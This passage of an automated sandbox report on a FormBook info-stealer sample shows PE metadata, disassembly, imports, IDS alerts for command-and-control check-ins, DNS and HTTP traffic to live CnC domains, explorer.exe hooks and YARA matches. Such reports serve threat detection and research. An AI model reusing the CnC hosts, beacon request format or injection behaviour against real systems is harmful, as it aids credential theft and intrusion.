                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:61259b55b8912888e90f516ca08dc514

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A230h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080C8h]
                  mov esi, dword ptr [004080CCh]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007FBB449DEC1Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007FBB449DEBEAh
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [007A8B58h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000xa50.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x3b90000xa500xc00False0.401692708333data4.18753619353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x3b91900x2e8dataEnglishUnited States
                  RT_DIALOG0x3b94780x100dataEnglishUnited States
                  RT_DIALOG0x3b95780x11cdataEnglishUnited States
                  RT_DIALOG0x3b96980x60dataEnglishUnited States
                  RT_GROUP_ICON0x3b96f80x14dataEnglishUnited States
                  RT_MANIFEST0x3b97100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.3188.114.96.1049808802031449 05/14/22-13:08:49.696707TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.3188.114.96.10
                  192.168.2.3188.114.96.1049808802031453 05/14/22-13:08:49.696707TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.3188.114.96.10
                  192.168.2.3188.114.96.1049808802031412 05/14/22-13:08:49.696707TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.3188.114.96.10

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 14, 2022 13:08:49.679449081 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.695677996 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.695893049 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.696707010 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.712908030 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.724560976 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.724622965 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:08:49.724986076 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.725151062 CEST4980880192.168.2.3188.114.96.10
                  May 14, 2022 13:08:49.741282940 CEST8049808188.114.96.10192.168.2.3
                  May 14, 2022 13:09:10.119378090 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.303877115 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.304033041 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.304163933 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.490811110 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.490907907 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.490958929 CEST8049810154.85.152.171192.168.2.3
                  May 14, 2022 13:09:10.491028070 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.491060019 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.491131067 CEST4981080192.168.2.3154.85.152.171
                  May 14, 2022 13:09:10.675293922 CEST8049810154.85.152.171192.168.2.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 14, 2022 13:08:49.640903950 CEST5015253192.168.2.38.8.8.8
                  May 14, 2022 13:08:49.670495033 CEST53501528.8.8.8192.168.2.3
                  May 14, 2022 13:09:09.940263033 CEST5663953192.168.2.38.8.8.8
                  May 14, 2022 13:09:10.118308067 CEST53566398.8.8.8192.168.2.3
                  May 14, 2022 13:09:30.653565884 CEST6272453192.168.2.38.8.8.8
                  May 14, 2022 13:09:30.674031019 CEST53627248.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  May 14, 2022 13:08:49.640903950 CEST192.168.2.38.8.8.80x9c1cStandard query (0)www.informacion-numero-24-h.siteA (IP address)IN (0x0001)
                  May 14, 2022 13:09:09.940263033 CEST192.168.2.38.8.8.80x8b0eStandard query (0)www.tzjisheng.comA (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.653565884 CEST192.168.2.38.8.8.80x8d9dStandard query (0)www.rodosmail.xyzA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  May 14, 2022 13:08:49.670495033 CEST8.8.8.8192.168.2.30x9c1cNo error (0)www.informacion-numero-24-h.site188.114.96.10A (IP address)IN (0x0001)
                  May 14, 2022 13:08:49.670495033 CEST8.8.8.8192.168.2.30x9c1cNo error (0)www.informacion-numero-24-h.site188.114.97.10A (IP address)IN (0x0001)
                  May 14, 2022 13:09:10.118308067 CEST8.8.8.8192.168.2.30x8b0eNo error (0)www.tzjisheng.com154.85.152.171A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)www.rodosmail.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST8.8.8.8192.168.2.30x8d9dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.informacion-numero-24-h.site
                  • www.tzjisheng.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349808188.114.96.1080C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  May 14, 2022 13:08:49.696707010 CEST7579OUTGET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1
                  Host: www.informacion-numero-24-h.site
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:08:49.724560976 CEST7580INHTTP/1.1 301 Moved Permanently
                  Date: Sat, 14 May 2022 11:08:49 GMT
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: max-age=3600
                  Expires: Sat, 14 May 2022 12:08:49 GMT
                  Location: https://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3jYpuw08wCTyYleUQgANz5%2FXm28vcSj4BwpLVOnE%2BnApx8wP1I2PlNxA8sjWRQIs%2Fbwiu%2BqJBI1neGaVXAUHTOBFP70cq8JwTnt1n%2F11%2Bw6rQ81FgayXw%2BWMDKdQyaFpmWylNMz5aZH9OSaPvxHi29l1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 70b32d9aab206937-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349810154.85.152.17180C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  May 14, 2022 13:09:10.304163933 CEST8190OUTGET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1
                  Host: www.tzjisheng.com
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:09:10.490811110 CEST8191INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Sat, 14 May 2022 11:09:10 GMT
                  Content-Type: text/html
                  Content-Length: 1780
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b3 b1 d6 dd c7 b1 b3 bf ce c4 bb af b4 ab b2 a5 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 2c 26 23 32 32 38 32 33 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 33 36 30 39 3b 26 23 33 34 35 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 36 30 38 30 3b 26 23 33 38 36 35 36 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 32 31 32 30 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 2c 26 23 32 32 38 32 33 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 33 36 30 39 3b 26 23 33 34 35 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 36 30 38 30 3b 26 23 33 38 36 35 36 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 32 31 32 30 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 37 3b 26 23 35 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 2c 26 23 32 32 38 32 33 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 33 36 30 39 3b 26 23 33 34 35 39 34 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 36 30 38
                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#26080;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;</title><meta name="keywords" content="&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#26080;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;" /><meta name="description" content="&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#2608
                  May 14, 2022 13:09:10.490907907 CEST8192INData Raw: 30 3b 26 23 33 30 37 32 31 3b 26 23 32 36 30 38 30 3b 26 23 33 38 36 35 36 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 32 31 32 30 3b 2c 26 23 33 34 39 38 37 3b 26 23 32 31 35 30 38 3b 26 23 33 31 31 38 31 3b 26 23 32 34 36 31 38
                  Data Ascii: 0;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;,&#34987;&#21508;&#31181;&#24618;&#29289;&#35302;&#25163;&#104;&#28748;&#28385;&#39640;&#28526;,&#27431;&#32654;&#51;&#112;&#20004;&#26681;&#21516;&#26102;&#36827;&#39640;&#28165;&#35270;&#3905


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:13:07:14
                  Start date:14/05/2022
                  Path:C:\Users\user\Desktop\inlaww321345.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\inlaww321345.exe"
                  Imagebase:0x400000
                  File size:277700 bytes
                  MD5 hash:43E64E0AB6CA479C2AF3AFED56216A91
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Target ID:1
                  Start time:13:07:15
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 46%, ReversingLabs
                  Reputation:low

                  General

                  Target ID:2
                  Start time:13:07:16
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Target ID:5
                  Start time:13:07:23
                  Start date:14/05/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6b8cf0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
